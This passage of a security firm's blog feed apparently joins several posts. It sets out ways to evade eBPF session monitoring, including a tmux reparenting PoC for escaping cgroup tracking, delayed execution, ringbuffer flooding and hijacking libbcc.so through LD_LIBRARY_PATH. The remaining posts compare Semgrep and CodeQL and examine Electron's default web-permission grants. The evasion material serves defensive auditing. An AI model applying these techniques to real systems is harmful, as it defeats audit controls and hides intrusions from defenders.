Not hooking all the network-related syscalls can have its own set of problems. Some monitoring solutions may only want to hook the EGRESS traffic, while an attacker could still send data to a non-allowed host abusing other network-sensitive operations (see aa_ops at linux/security/apparmor/include/audit.h:78) related to INGRESS traffic:

OP_BIND, the bind() function shall assign a local socket address to a socket identified by descriptor socket that has no local socket address assigned.
OP_LISTEN, the listen() function shall mark a connection-mode socket, specified by the socket argument, as accepting connections.
OP_ACCEPT, the accept() function shall extract the first connection on the queue of pending connections, create a new socket with the same socket type protocol and address family as the specified socket, and allocate a new file descriptor for that socket.
OP_RECVMSG, the recvmsg() function shall receive a message from a connection-mode or connectionless-mode socket.
OP_SETSOCKOPT, the setsockopt() function shall set the option specified by the option_name argument, at the protocol level specified by the level argument, to the value pointed to by the option_value argument for the socket associated with the file descriptor specified by the socket argument. Interesting options for attackers are SO_BROADCAST, SO_REUSEADDR, SO_DONTROUTE.

Generally, the network monitoring should look at all socket-based operations similarly to AppArmor.

In case the same local user has mixed monitored and unmonitored console sessions, it could be possible for an attacker in a monitored session to leverage open file descriptors and sockets to send data to restricted hosts. In 2020 some versions of Linux kernels had introduced a new system call to achieve this called pidfd_getfd. A small number of operating systems (like Ubuntu) implement the Yama kernel module that limit file descriptor access to only child-parent processes. A PoC code for using this function is available on Github (TheZ3ro/fdstealer).

2. Delayed execution

If only active console sessions are monitored, eBPF programs may only live for the time span of the session. By delaying the execution of a command (through sleep, timeout, sar, vmstat, inotifywait, at, cron …) and quitting the session, it could be possible to completely evade the solution.

3. Evade scoped event monitoring based on `cgroup`

A security monitoring solution may only be interested in auditing a specific user or cgroup (such in the context of a remote console session). Taking Teleport as an example, it achieves this by correlating every event to a session with control groups (cgroupv2 in particular). Control grouping is a Linux kernel feature to limit access to resources to a group of processes. It is used in many containerization technologies (behind the scenes Docker creates a set of namespaces and control groups for the container) and its peculiarity is that all child processes will keep the id of the parent process. When Teleport starts an SSH session, it first re-launches itself and places itself within a cgroup. This allows not only that process, but all future processes that Teleport launches, to be tracked with a unique ID. The BPF programs that Teleport runs have been updated to also emit the cgroup ID of the program executing them. The BPF script checks the value returned by bpf_get_current_cgroup_id() and only cares about the important session cgroup. The simplest evasion to this auditing strategy would be changing your cgroup ID, but an attacker needs to be root to achieve this. Meddling with the cgroupv2 pseudo file system or abusing PAM configuration are also potential opportunities to affect the cgroup/session correlation.

Another technique involves being reallocated by init. In the case of Teleport, when the bash process spawned by the session dies, its child processes become orphans and the Teleport process terminates its execution. When a child process becomes an orphan, it can be assigned to a different cgroup by the operating system under certain conditions (not having a tty, being a process group leader, joining a new process session). This allows an attacker to bypass the restrictions in place. The following PoC is an example of a bypass for this design:

Open a new eBPF-monitored session
Start tmux by executing the tmux command
Detach from tmux by pressing CTRL+B and then D
Kill the bash process that is tmux’s parent
Re-attach to the tmux process by executing tmux attach. The process tree will now look like this:

As another attack avenue, leveraging processes run by different local users/cgroupv2 on the machine (abusing other daemons, delegating systemd) can also help an attacker evade this. This aspect obviously depends on the system hosting the monitoring solution. Protecting against this is tricky, since even if PR_SET_CHILD_SUBREAPER is set to ensure that the descendants can’t re-parent themselves to init, if the ancestor reaper dies or is killed (DoS), then processes in that service can escape their cgroup “container”. Any compromise of this privileged service process (or malfeasance by it) allows it to kill its hierarchy manager process and escape all control.

4. Memory limits and loss of events

BPF programs have a lot of constraints. Only 512 bytes of stack space are reserved for the eBPF program. Variables will get hoisted and instantiated at the start of execution, and if the script tries to dump syscall arguments or pt-regs, it will run out of stack space very quickly. If no workaround on the instruction limit is set, it could be possible to push the script into retrieving something too big to ever fit on the stack, losing visibility very soon when the execution gets complicated. But even when workarounds are used (e.g., when using multiple probes to trace the same events but capture different data, or split your code into multiple programs that call each other using a program map) there still may be a chance to abuse it. BPF programs are not meant to be run forever, but they have to stop at some point. By way of example, if a monitoring solution is running on CentOS 7 and trying to capture a process arguments and its environment variables, the emitted event could have too many argv and too many envp. Even in that case, you may miss some of them because the loop stops earlier. In these cases, the event data will be truncated. It’s important to note that these limitations are different based on the kernel where BPF is being run, and how the endpoint agent is written.

Another peculiarity of eBPFs is that they’ll drop events if they can not be consumed fast enough, instead of dragging down the performance of the entire system with it. An attacker could abuse this by generating a sufficient number of events to fill up the perf ringbuffer and overwrite data before the agent can read it.

5. Never trust the userspace

The kernel-space understanding of a pid is not the same as the user-space understanding of a pid. If the eBPF script is trying to identify a file, the right way would be to get the inode number and device number, while a file descriptor won’t be as useful. Even in that case, probes could be subject to TOCTOU issues since they’ll be sending data to user mode that can easily change. If the script is instead tracing syscalls directly (using tracepoint or kprobe) it is probably stuck with file descriptors and it could be possible to obfuscate executions by playing around with the current working directory and file descriptors, (e.g., by combining fchdir, openat, and execveat).

6. Abuse the lack of `seccomp-bpf` & kernel discrepancies

eBPF-based monitoring solutions should protect themselves by using seccomp-BPF to permanently drop the ability to make the bpf() syscall before spawning a console session. If not, an attacker will have the ability to make the bpf() syscall to unload the eBPF programs used to track execution. Seccomp-BPF uses BPF programs to filter arbitrary system calls and their arguments (constants only, no pointer dereference).

Another thing to keep in mind when working with kernels, is that interfaces aren’t guaranteed to be consistent and stable. An attacker may abuse eBPF programs if they are not run on verified kernel versions. Usually, conditional compilation for a different architecture is very convoluted for these programs and you may find that the variant for your specific kernel is not targeted correctly. One common pitfall of using seccomp-BPF is filtering on system call numbers without checking the seccomp_data->arch BPF program argument. This is because on any architecture that supports multiple system call invocation conventions, the system call numbers may vary based on the specific invocation. If the numbers in the different calling conventions overlap, then checks in the filters may be abused. It is therefore important to ensure that the differences in bpf() invocations for each newly supported architecture are taken into account by the seccomp-BPF filter rules.

7. Interfere with the agents

Similarly to (6), it may be possible to interfere with the eBPF program loading in different ways, such as targeting the eBPF compiler libraries (BCC’s libbcc.so) or adapting other shared libraries preloading methods to tamper with the behavior of legit binaries of the solution, ultimately performing harmful actions. In case an attacker succeeds in altering the solution’s host environment, they can add in front of the LD_LIBRARY_PATH, a directory where they saved a malicious library having the same libbcc.so name and exporting all the symbols used (to avoid a runtime linkage error). When the solution starts, instead of the legit bcc library, it gets linked with the malicious library. Defenses against this may include using statically linked programs, linking the library with the full path, or running the program into a controlled environment.

Many thanks to the whole Teleport Security Team, @FridayOrtiz, @Th3Zer0, & @alessandrogario for the inspiration and feedback while writing this blog post.

Comparing Semgrep and CodeQL

2022-10-06T00:00:00+02:00

Introduction

Recently, a client of ours asked us to put R2c’s Semgrep in a head-to-head test with GitHub’s CodeQL. Semgrep is open source and free (with premium options). CodeQL “is free for research and open source” projects and accepts open source contributions to its libraries and queries, but is not free for most companies. Many of our engineers had already been using Semgrep frequently, so we were reasonably familiar with it. On the other hand, CodeQL hadn’t gained much traction for our internal purposes given the strict licensing around consulting. That said, our client’s use case is not the same as ours, so what works for us, may not work well for them. We have decided to share our results here.

SAST background

A SAST tool generally consists of a few components 1) a lexer/parser to make sense of the language, 2) rules which process the output produced by the lexer/parser to find vulnerabilities and 3) tools to manage the output from the rules (tracking/ticketing, vulnerability classification, explanation text, prioritization, scheduling, third-party integrations, etc).

Difficulties in evaluating SAST tools

The rules are usually the source of most SAST complaints because ultimately, we all hope ideally that the tool produces perfect results, but that’s unrealistic. On one hand, you might get a tool that doesn’t find the bug you know is in the code (a false negative - FN) or on the other, it might return a bunch of useless supposed findings that are either lacking any real impact or potentially just plain wrong (a false positive - FP). This leads to our first issue when attempting to quantitatively measure how good a SAST tool is - what defines true/false or positives/negatives?

Some engineers might say a true positive is a demonstrably exploitable condition, while others would say matching the vulnerable pattern is all that matters, regardless of the broader context. Things are even more complicated for applications that incorporate vulnerable code patterns by design. For example, systems administration applications which executes shell commands, via parameters passed in a web request. In most environments, this is the worst possible scenario. However, for these types of apps, it’s their primary purpose. In those cases, engineers are then left with the subjective question of whether to classify a finding as a true or false positive where an application’s users can execute arbitrary code in an application, that they’d need to be fully and properly authenticated and authorized to do.

These types of issues come from asking too much of the SAST application and we should focus on locating vulnerable code patterns - leaving it to people to vet and sort the findings. This is one of the places where the third set of components comes into play and can be a real differentiator between SAST applications. How users can ignore the same finding class(es), findings on the same code, findings on certain paths, or conditionally ignoring things, becomes very important to filter the signal from the noise. Typically, these tools become more useful for organizations that are willing to commit the time to configure the scans properly and refine the results, rather than spending it triaging a bunch of issues they didn’t want to see in the first place and becoming frustrated.

Furthermore, quantitative comparisons between tools can be problematic for several reasons. For example, if tool A finds numerous low severity bugs, but misses a high severity one, while tool B finds only a high severity bug, but misses all the low severity ones, which is a better tool? Numerically, tool A would score better, but most organizations would rather find the higher severity vulnerability. If tool A finds one high severity vulnerability and B finds a different one, but not the one A finds, what does it mean? Some of these questions can be handled with statistical methods, but most people don’t usually take this approach. Additionally, issues can come up when you’re in a multi-language environment where a tool works great on one language and not so great on the others. Yet another twist might be if a tool missed a vulnerability that was due to a parsing error, that would certainly be fixed in a later release, rather than a rules matching issue specifically.

These types of concerns don’t necessarily have easy answers and it’s important to remember that any evaluation of a SAST tool is subject to variations based on the language(s) being examined, which rules are configured to run, the code repository’s structure and contents, and any customizations applied to the rules or tool configuration.

Another hurdle in properly evaluating a SAST tool is finding a body of code on which to test it. If the objective is to simply scan the code and verify whether the findings are true positives (TP) or false positives (FP), virtually any supported code could work, but finding true negatives (TN) and false negatives (FN) require prior knowledge of the security state of the code or having the code manually reviewed.

This then raises the question of how to quantify the negatives that a SAST tool can realistically discover. Broadly, a true positive is either a connection of a source and unprotected sink or possibly a stand-alone configuration (e.g., disabling a security feature). So how do we count true negatives specifically? Do we count the total number or sources that lead to a protected sink, the total of protected sinks, the total safe function calls (regardless if they are identified sinks), and all the safe configuration options? Of course, if the objective is solely to verify the relative quality of detection between competing software, simply comparing the results, provided all things were reasonably equal, can be sufficient.

Our testing methodology

We utilized the OWASP Benchmark Project to analyze pre-classified Java application code to provide a more accurate head-to-head comparison of Semgrep vs. CodeQL. While we encountered a few bugs running the tools, we were able to work around them and produce a working test and meaningful results.

Both CodeQL and Semgrep came with sample code used to demonstrate the tool’s capabilities. We used the test suite of sample vulnerabilities from each tool to test the other, swapping the tested files “cross-tool”. This was done with the assumption that the test suite for each tool should return 100% accurate results for the original tool, by design, but not necessarily for the other. Some modifications and omissions were necessary however, due to the organization and structure of the test files.

We also ran the tools against a version of our client’s code in the manner that required the least amount of configuration and/or knowledge of the tools. This was intended to show what you get “out of the box” for each tool. We iterated over several configurations of the tools and their rules, until we came to a meaningful, yet manageable set of results (due to time constraints).

Assigning importance

When comparing SAST tools, based on past experience, we feel these criteria are important aspects that need to be examined.

Language and framework support
Lexer/Parser functionality
Pre/post scan options (exclusions, disabling checks, filtering, etc.)
Rules
Findings workflows (internal tracking, ticket system integration, etc.)
Scan times

Language and framework support

The images below outline the supported languages for each tool, refer to the source links for additional information about the supported frameworks:

Semgrep:

Source: https://semgrep.dev/docs/supported-languages/

CodeQL:

Source: https://codeql.github.com/docs/codeql-overview/supported-languages-and-frameworks/

Not surprisingly, we see support for many of the most popular languages in both tools, but a larger number, both in GA and under development in Semgrep. Generally speaking, this gives an edge to Semgrep, but practically speaking, most organizations only care if it supports the language(s) they need to scan.

Lexer/Parser functionality

Lexer/parser performance will vary based on the language and framework, their versions and code complexity. It is only possible to get a general sense of this by scanning numerous repositories and monitoring for errors or examining the source of the parser and tool.

During testing on various applications, both tools encountered errors allowing only the partial parsing of many files. The thoroughness of the parsing results varied depending on the tool and on the code being analyzed. Testing our client’s Golang project, we did occasionally encounter parsing errors with both as well.

Semgrep:

We encountered an issue when testing against third-party code where a custom function (exit()) was declared and used, despite being reserved, causing the parser to fail once the function was reached, due to invalid syntax. The two notable things here are that the code should theoretically not work properly and that despite this, Semgrep was still able to perform a partial examination. Semgrep excelled in terms of the ability to handle incomplete code or code with errors as it operates on a single file scope generally.

CodeQL:

CodeQL works a bit differently, in that it effectively creates a database from the code, allowing you to then write queries against that database to locate vulnerabilities. In order for it to do this, it requires a fully buildable application. This inherently means that it must be more strict with its ability to parse all the code.

In our testing, CodeQL generated errors on the majority of files that it had findings for (partial parsing at best), and almost none were analyzed without errors. Roughly 85% of files generated some errors during database creation.

According to CodeQL, a small number of extraction errors is normal, but a large number is not. It was unclear how to reduce the large number of extraction errors. According to CodeQL’s documentation, the only ways were to wait for CodeQL to release a fixed version of the extractor or to debug using the logs. We attempted to debug with the logs, but the error messages were not completely clear and it seemed that the two most common errors were related to the package names declared at the top of the files and variables being re-declared. It was not completely clear if these errors were due to an overly strict extractor or if the code being tested was incomplete.

Semgrep would seem to have the advantage here, but it’s not a completely fair comparison, due to the different modes of operation.

Pre/post scan options

Semgrep:

Among the options you can select when firing up a Semgrep scan are:

Choosing which rules, or groups of rules, to run, or allowing automatic selection
- Semgrep registry rules (remote community and r2c created; currently 973 rules)
- Local custom rules and/or “ephemeral” rules passed as an argument on the command line
- A combination of the above
Choosing which languages to examine
A robust set of filtering options to include/exclude files, directories and specific content
Ability to configure a comparison baseline (find things not already in commit X)
Whether to continue if errors or vulnerabilities are encountered
Whether to automatically perform fixes by replacing text and whether to perform dry runs to check before actually changing
The maximum size of the files to scan
Output formats

Notes:

While the tool does provide an automated scanning option, we found situations in which -–config auto did not find all the vulnerabilities that manually selecting the language did.
The re-use/tracking of the scan results requires using Semgrep CI or Semgrep App.

CodeQL:

CodeQL requires a buildable application (i.e., no processing of a limited set of files), with a completely different concept of “scanning”, so this notion doesn’t directly translate. In effect, you create a database from the code, which you subsequently query to find bugs, so much of the “filtering” can be accomplished by modifying the queries that are run.

Options include:

Specifying which language(s) to process
- The CodeQL repository contains libraries and specific queries for each language
- The Security folder contains (21) queries for various CWEs
Which queries to run
Location of the files
When the queries are run on the resulting database you can specify the output format
Adjustable verbosity when creating the database(s)

Because CodeQL creates a searchable database, you can indefinitely run queries against the scanned version of the code.

Because of the different approaches it is difficult to say one tool has an advantage over the other. The most significant difference is probably that Semgrep allows you to automatically fix vulnerabilities.

Rules

As mentioned previously, these tools take completely different approaches (i.e., rules vs queries). Whether someone prefers writing queries vs. YAML is subjective, so we’ll not discuss the formats themselves specifically.

Semgrep:

As primarily a string-matching static code analysis tool, Semgrep’s accuracy is mostly driven by the rules in use and their modes of operation. Semgrep is probably best thought of as an improvement on the Linux command line tool grep. It adds improved ease of use, multi-line support, metavariables and taint tracking, as well as other features that grep directly does not support. Beta features also include the ability to track across related files.

Semgrep rules are defined in relatively simple YAML files with only a handful of elements used to create them. This allows someone to become reasonably proficient with the tool in a matter of hours, after reading the documentation and tutorials. At times, the tool’s less than full comprehension of the code can cause rule writing to be more difficult than it might appear at first glance.

In Semgrep, there are several ways to execute rules, either locally or remotely. Additionally, you can pass them as command line arguments referred to as “ephemeral” rules, eliminating the YAML files altogether.

The rule below shows an example of a reasonably straightforward rule. It effectively looks for an insecure comparison of something that might be a secret within an HTTP request.

rules:
  - id: insecure-comparison-taint
    message: >-
      User input appears to be compared in an insecure manner that allows for side-channel timing attacks. 
    severity: ERROR
    languages: [go]
    metadata:
      category: security
    mode: taint
    pattern-sources:
      - pattern-either:
          - pattern: "($ANY : *http.Request)"
          - pattern: "($ANY : http.Request)"
    pattern-sinks:
      - patterns:
          - pattern-either: 
            - pattern: "... == $SECRET"
            - pattern: "... != $SECRET"
            - pattern: "$SECRET == ..."
            - pattern: "$SECRET != ..."
          - pattern-not: len(...) == $NUM
          #- pattern-not: <... len(...) ...>
          - metavariable-regex:
              metavariable: $SECRET
              regex: .*(secret|password|token|otp|key|signature|nonce).*

The logic in the rules is familiar and amounts to what feels like stacking of RegExs, but with the added capability of creating boundaries around what is matched against and with the benefit of language comprehension. It is important to note however that Semgrep lacks a full understanding of the code flow sufficient enough to trace source to sink flows through complex code. By default it works on a single file basis, but Beta features also include the ability to track across related files. Semgrep’s current capabilities lie somewhere between basic grep and a traditional static code analysis tool, with abstract syntax trees and control flow graphs.

No special preparation of repositories is needed before scanning can begin. The tool is fully capable of detecting languages and running simultaneous scans of multiple languages in heterogeneous code repositories. Furthermore, the tool is capable of running on code which isn’t buildable, but the tool will return errors when it parses what it deems as invalid syntax.

That said, rules tend to be more general than the queries in CodeQL and could potentially lead to more false positives. For some situations, it is not possible to make a rule that is completely accurate without customizing the rule to match a specific code base.

CodeQL:

CodeQL’s query language has a SQL-like syntax with the following features:

Logical: all the operations in QL are logical operations.
Declarative: provide the properties the results must satisfy rather than the procedure to compute the results.
Object-oriented: it uses classes, inheritance and other object oriented features to increase modularity and reusability of the code.
Read-only: no side effect, no imperative features (ex. variable assignment).

The engine has extractors for each supported language. They are used to extract the information from the codebase into the database. Multi-language code bases are analyzed one at a time. Trying to specify a list of target languages (go, javascript and c) didn’t work out of the box because CodeQL required to explicitly set the build command for this combination of languages.

CodeQL can also be used in VSCode as an extension, a CLI tool or integrated with Github workflows. The VS extension code allows writing the queries with the support of the autocompletion by the IDE and testing them against one or more databases previously created.

The query below shows how you would search for the same vulnerability as the Semgrep rule above.

/**
 * @name Insecure time comparison for sensitive information
 * @description Input appears to be compared in an insecure manner (timing attacks)
 */


import go

from EqualityTestExpr e, DataFlow::CallNode called
where
  // all the functions call where the argument matches the RegEx
  called
      .getAnArgument()
      .toString()
      .toLowerCase()
      .regexpMatch(".*(secret|password|token|otp|key|signature|nonce).*") and
  e.getAnOperand() = called.getExpr()
select called.getExpr(), "Uses a constant time comparison for sensitive information"

In order to create a database, CodeQL requires a buildable codebase. This means that an analysis consists of multiple steps: standard building of the codebase, creating the database and querying the codebase. Due to the complexity of the process in every step, our experience was that a full analysis can require a non-negligible amount of time in some cases.

Writing queries for CodeQL also requires a great amount of effort, especially at the beginning. The user should know the CodeQL syntax very well and pay attention to the structure of the condition to avoid killing the performance. We experienced an infinite compilation time just adding an OR condition in the WHERE clause of a query. Starting from zero experience with the tool, the benefits of using CodeQL are perceivable only in the long run.

Findings workflows

Semgrep:

As Semgrep allows you to output to a number of formats, along with the CLI output, there are a number of ways you can manage the findings. They also list some of this information on their manage-findings page.

CodeQL:

Because the CodeQL CLI tool reports findings in a CSV or SARIF file format, triaging findings reported by it can be quite tedious. During testing, we felt the easiest way to review findings from the CodeQL CLI tool was to launch the query from Visual Studio Code and manually review the results from there (due to the IDE’s navigation features). Ultimately, in real-world usage, the results are probably best consumed through the integration with GitHub.

Scan times

Due to the differences between their approaches, it’s difficult to fairly quantify the differences in speed between the two tools. Semgrep is a clear winner in the time it takes to setup, run a scan and get results. It doesn’t interpret the code as deeply as CodeQL does, nor does it have to create a persistent searchable database, then run queries against it. However, once the database is created, you could argue that querying for a specific bug in CodeQL versus scanning a project again in Semgrep would be roughly similar, depending on multiple factors not directly related to the tools (e.g., hardware, language, code complexity).

This highlights the fact that tool selection criteria should incorporate the use-case.

Scanning in a CI/CD pipeline - speed matters more
Ongoing periodic scans - speed matters less
Time based consulting work - speed is very important

OWASP Benchmark Project results

This section shows the results of using both of these SAST tools to test the same repository of Java code (the only language option). This project’s sample code had been previously reviewed and categorized, specifically to allow for benchmarking of SAST tools. Using this approach we could relatively easily run a head-to-head comparison and allow the OWASP Benchmark Project to score and graph the performance of each tool.

Drawbacks to this approach include the fact that it is one language, Java, and that is not the language of choice for our client. Additionally, SAST tool maintainers, who might be aware of this project, could theoretically ensure their tools perform well in these tests specifically, potentially masking shortcomings when used in broader contexts.

In this test, Semgrep was configured to run with the latest “security-audit” Registry ruleset, per the OWASP Benchmark Project recommendations. CodeQL was run using the “Security-and-quality queries” query suite. The CodeQL query suite includes queries from “security-extended”, plus maintainability and reliability queries.

As you can see from the charts below, Semgrep performed better, on average, than CodeQL did. Examining the rules a bit more closely, we see three CWE (Common Weakness Enumeration) areas where CodeQL does not appear to find any issues, significantly impacting the average performance. It should also be noted that CodeQL does outperform in some categories, but determining the per-category importance is left to the tool’s users.

Cross-tool test suite results

This section discusses the results of using the Semgrep tool against the test cases for CodeQL and vice versa. While initially seeming like a great way to compare the tools, unfortunately, the test case files presented several challenges to this approach. While being labeled things like “Good” and “Bad” either in file names or comments, the files were not necessarily all “Good” code or “Bad” code, but inconsistently mixed, inconsistently labeled and sometimes with multiple potential vulnerabilities in the same files. Additionally, we occasionally discovered vulnerabilities in some of the files which were not the CWE classes that were supposed to be in the files (e.g., finding XSS in an SQL Injection test case).

These issues prevented a simple count based on the files that were/were not found to have vulnerabilities. The statistics we present have been modified as much as possible in the allotted time to account for these issues and we have applied data analysis techniques to account for some of the errors.

As you can see in the table below, CodeQL performed significantly better with regards to detection, but at the cost of a higher false positive rate as well. This underscores some of the potential tradeoffs, mentioned in the introduction, which need to be considered by the consumer of the output.

Notes:

Semgrep’s configuration was limited to only running rules classified as security-related and only against Golang files, for efficiency’s sake.
Semgrep successfully identified vulnerabilities associated with CWE-327, CWE-322 and CWE-319
Semgrep’s results only included two vulnerabilities which were the one intended to be found in the file (e.g., test for X find X). The remainder were HTTPs issues (CWE-319) related to servers configured for testing purposes in the CodeQL rules (e.g., test for X but find valid Y instead).
CodeQL rules for SQL injection did not perform well in this case (~20% detection), but did better in cross-site scripting and other tests. There were fewer overall rules available during testing, compared to Semgrep, and vulnerability classes like Server Side Template Injection (SSTI) were not checked for, due to the absence of rules.
Out of 14 files that CodeQL generated findings for, only 2 were analyzed without errors. 85% of files generated some errors during database creation.
False negative rates can increase dramatically if CodeQL fails to extract data from code. It is essential to make sure that there are not excessive extraction errors when creating a database or running any of the commands that implicitly run the extractors.

Client code results

This section discusses the results of using the tools to examine an open source Golang project for one of our clients.

In these tests, due to the aforementioned lack of a priori knowledge of the code’s true security status, we are forced to assume that all files without true positives are free from vulnerabilities and are therefore considered TNs and likewise that there are no FNs. This underscores that testing against code that has already been organized for evaluation can be assumed as more accurate.

Running Semgrep with the “r2c-security-audit” configuration, resulted in 15 Golang findings, all of which were true positives. That said, the majority of the findings were related to the use of the unsafe library. Due to the nature of this issue, we opted to only count it as one finding per file, as to not further skew the results, by counting each usage within a file.

As shown in the table below, both tools performed very well! CodeQL detected significantly more findings, but it should be noted that they were largely the same couple of issues across numerous files. In other words, there were repeated code patterns in many cases, skewing the volume of findings.

For the purposes of this exercise, TN = Total .go files - TP (890-15) = 875, since we are assuming all those files are free of vulnerabilities. For the Semgrep case, the value is irrelevant for the rate calculations, since no false positives were found.
Semgrep in --config auto mode resulted in thousands of findings when run against our client’s code, as opposed to tens of findings when limiting the scans to security-specific tests on Golang only. We cite this, to underscore that results will vary greatly depending on the code tested and rules applied. That reduction in scope resulted in no false positives during manually reviewed results.
For CodeQL, approximately 25% of the files were not scanned, due to issues with the tool
CodeQL encountered many errors during file compilation. 63 out of 74 Go files generated errors while being extracted to CodeQL’s database. This means that the analysis was performed on less data, and most files were only partially analyzed by CodeQL. This caused the CodeQL scan to result in significantly less findings than expected.

Conclusion

Obviously there could be some bias, but if you’d like another opinion, the creators of Semgrep have also provided a comparison with CodeQL on their website, particularly in this section : “How is Semgrep different from CodeQL?”.

Not surprisingly, in the end, we still feel Semgrep is a better tool for our use as a security consultancy boutique doing high-quality manual audits. This is because we don’t always have access to all the source code that we’d need to use CodeQL, the process of setting up scans is more laborious and time consuming in CodeQL. Additionally, we can manually vet findings ourselves - so a few extra findings isn’t a major issue for us and we can use it for free. If an organization’s use-case is more aligned with our client’s - being an organization that is willing to invest the time and effort, is particularly sensitive to false positives (e.g. running a scan during CI/CD) and doesn’t mind paying for the licensing, CodeQL might be a better choice for them.

Diving Into Electron Web API Permissions

2022-09-27T00:00:00+02:00

Introduction

When a Chrome user opens a site on the Internet that requests a permission, Chrome displays a large prompt in the top left corner. The prompt remains visible on the page until the user interacts with it, reloads the page, or navigates away. The permission prompt has Block and Allow buttons, and an option to close it. On top of this, Chrome 98 displays the full prompt only if the permission was triggered “through a user gesture when interacting with the site itself”. These precautionary measures are the only things preventing a malicious site from using APIs that could affect user privacy or security.

Since Chrome implements this pop-up box, how does Electron handle permissions? From Electron’s documentation:

“In Electron the permission API is based on Chromium and implements the same types of permissions. By default, Electron will automatically approve all permission requests unless the developer has manually configured a custom handler. While a solid default, security-conscious developers might want to assume the very opposite.”

This approval can lead to serious security and privacy consequences if the renderer process of the Electron application were to be compromised via unsafe navigation (e.g., open redirect, clicking links) or cross-site scripting. We decided to investigate how Electron implements various permission checks to compare Electron’s behavior to that of Chrome and determine how a compromised renderer process may be able to abuse web APIs.

Webcam, Microphone, and Screen Recording Permissions

The webcam, microphone, and screen recording functionalities present a serious risk to users when approval is granted by default. Without implementing a permission handler, an Electron app’s renderer process will have access to a user’s webcam and microphone. However, screen recording requires the Electron app to have configured a source via a desktopCapturer in the main process. This leaves little room for exploitability from the renderer process, unless the application already needs to record a user’s screen.

Electron groups these three into one permission, “media”. In Chrome, these permissions are separate. Electron’s lack of separation between these three is problematic because there may be cases where an application only requires the microphone, for example, but must also be granted access to record video. By default, the application would not have the capability to deny access to video without also denying access to audio. For those wondering, modern Electron apps seemingly handling microphone & video permissions separately, are only tracking and respecting the user choices in their UI. An attacker with a compromised renderer could still access any media.

It is also possible for media devices to be enumerated even when permission has not been granted. In Chrome however, an origin can only see devices that it has permission to use. The API navigator.mediaDevices.enumerateDevices() will return all of the user’s media devices, which can be used to fingerprint the user’s devices. For example, we can see a label of “Default - MacBook Pro Microphone (Built-in)”, despite having a deny-all permission handler.

To deny access to all media devices (but not prevent enumerating the devices), a permission handler must be implemented in the main process that rejects requests for the “media” permission.

File System Access API

The File System Access API normally allows access to read and write to local files. In Electron, reading files has been implemented but writing to files has not been implemented and permission to write to files is always denied. However, access to read files is always granted when a user selects a file or directory. In Chrome, when a user selects a file or directory, Chrome notifies you that you are granting access to a specific file or directory until all tabs of that site are closed. In addition, Chrome prevents access to directories or files that are deemed too sensitive to disclose to a site. These are both considerations mentioned in the API’s standard (discussed by the WICG).

“User agents should try to make sure that users are aware of what exactly they’re giving websites access to” – implemented in Chrome with the notification after choosing a file or directory

“User agents are encouraged to restrict which directories a user is allowed to select in a directory picker, and potentially even restrict which files the user is allowed to select” – implemented in Chrome by preventing users from sharing certain directories containing system files. In Electron, there is no such notification or prevention. A user is allowed to select their root directory or any other sensitive directory, potentially granting more access than intended to a website. There will be no notification alerting the user of the level of access they will be granting.

Clipboard, Notification, and Idle Detection APIs

For these three APIs, the renderer process is granted access by default. This means a compromised renderer process can read the clipboard, send desktop notifications, and detect when a user is idle.

Clipboard

Access to the user’s clipboard is extremely security-relevant because some users will copy passwords or other sensitive information to the clipboard. Normally, Chromium denies access to reading the clipboard unless it was triggered by a user’s action. However, we found that adding an event handler for the window’s load event would allow us to read the clipboard without user interaction.

To deny access to this API, deny access to the “clipboard-read” permission.

Notifications

Sending desktop notifications is another security-relevant feature because desktop notifications can be used to increase the success rate of phishing or other social engineering attempts.

To deny access to this API, deny access to the “notifications” permission.

Idle Detection

The Idle Detection API is much less security-relevant, but its abuse still represents a violation of user privacy.

To deny access to this API, deny access to the “idle-detection” permission.

Local Font Access API

For this API, the renderer process is granted access by default. Furthermore, the main process never receives a permission request. This means that a compromised renderer process can always read a user’s fonts. This behavior has significant privacy implications because the user’s local fonts can be used as a fingerprint for tracking purposes and they may even reveal that a user works for a specific company or organization. Yes, we do use custom fonts for our reports!

Security Hardening for Electron App Permissions

What can you do to reduce your Electron application’s risk? You can quickly assess if you are mitigating these issues and the effectiveness of your current mitigations using ElectroNG, the first SAST tool capable of rapid vulnerability detection and identifying missing hardening configurations. Among its many features, ElectroNG features a dedicated check designed to identify if your application is secure from permission-related abuses:

A secure application will usually deny all the permissions for dangerous web APIs by default. This can be achieved by adding a permission handler to a Session as follows:

  ses.setPermissionRequestHandler((webContents, permission, callback) => {
    return callback(false);
  })

If your application needs to allow the renderer process permission to access some web APIs, you can add exceptions by modifying the permission handler. We recommend checking if the origin requesting permission matches an expected origin. It’s a good practice to also set the permission request handler to null first to force any permission to be requested again. Without this, revoked permissions might still be available if they’ve already been used successfully.

session.defaultSession.setPermissionRequestHandler(null);

Conclusions

As we discussed, these permissions present significant risk to users even in Electron applications setting the most restrictive webPreferences settings. Because of this, it’s important for security teams & developers to strictly manage the permissions that Electron will automatically approve unless the developer has manually configured a custom handler.

ElectroNG, our premium SAST tool released!

2022-09-06T00:00:00+02:00

As promised in November 2021 at Hack In The Box #CyberWeek event in Abu Dhabi, we’re excited to announce that ElectroNG is now available for purchase at https://get-electrong.com/.

Our premium SAST tool for Electron applications is the result of many years of applied R&D! Doyensec has been the leader in Electron security since being the first security company to publish a comprehensive security overview of the Electron framework during BlackHat USA 2017. Since then, we have reported dozens of vulnerabilities in the framework itself and popular Electron-based applications.

A bit of history

We launched Electronegativity OSS at the beginning of 2019 as a set of scripts to aid the manual auditing of Electron apps. Since then, we’ve released numerous updates, educated developers on security best practices, and grown a strong community around Electron application security. Electronegativity is even mentioned in the official security documentation of the framework.

At the same time, Electron has established itself as the framework of choice for developing multi-OS desktop applications. It is now used by over a thousand public desktop applications and many more internal tools and custom utilities. Major tech companies are betting on this technology by devoting significant resources to it, and it is now evident that Electron is here to stay.

What’s new?

Considering the evolution of the framework and emerging threats, we had quickly realized that Electronegativity was in need of a significant refresh, in terms of detection and features, to be able to help modern companies in “building with security”.

At the end of 2020, we sat down to create a project roadmap and created a development team to work on what is now ElectroNG. In this blog post, we will highlight some of the major improvements over the OSS version. There is much more under the hood, and we will be covering more features in future posts and presentations.

User Interface

If you’ve ever used Electronegativity, it would be obvious that ElectroNG is no longer a command-line tool. Instead, we’ve built a modern desktop app (using Electron!).

Your browser does not support the video tag.

Better Detection, More Checks

ElectroNG features a new decision mechanism to flag security issues based on improved HTML/JavaScript/Typescript parsing and new heuristics. After developing that, we improved all existing atomic and conditional checks to reduce the number of false positives and improve accuracy. There are now over 50 checks to detect misconfigurations and security vulnerabilities!

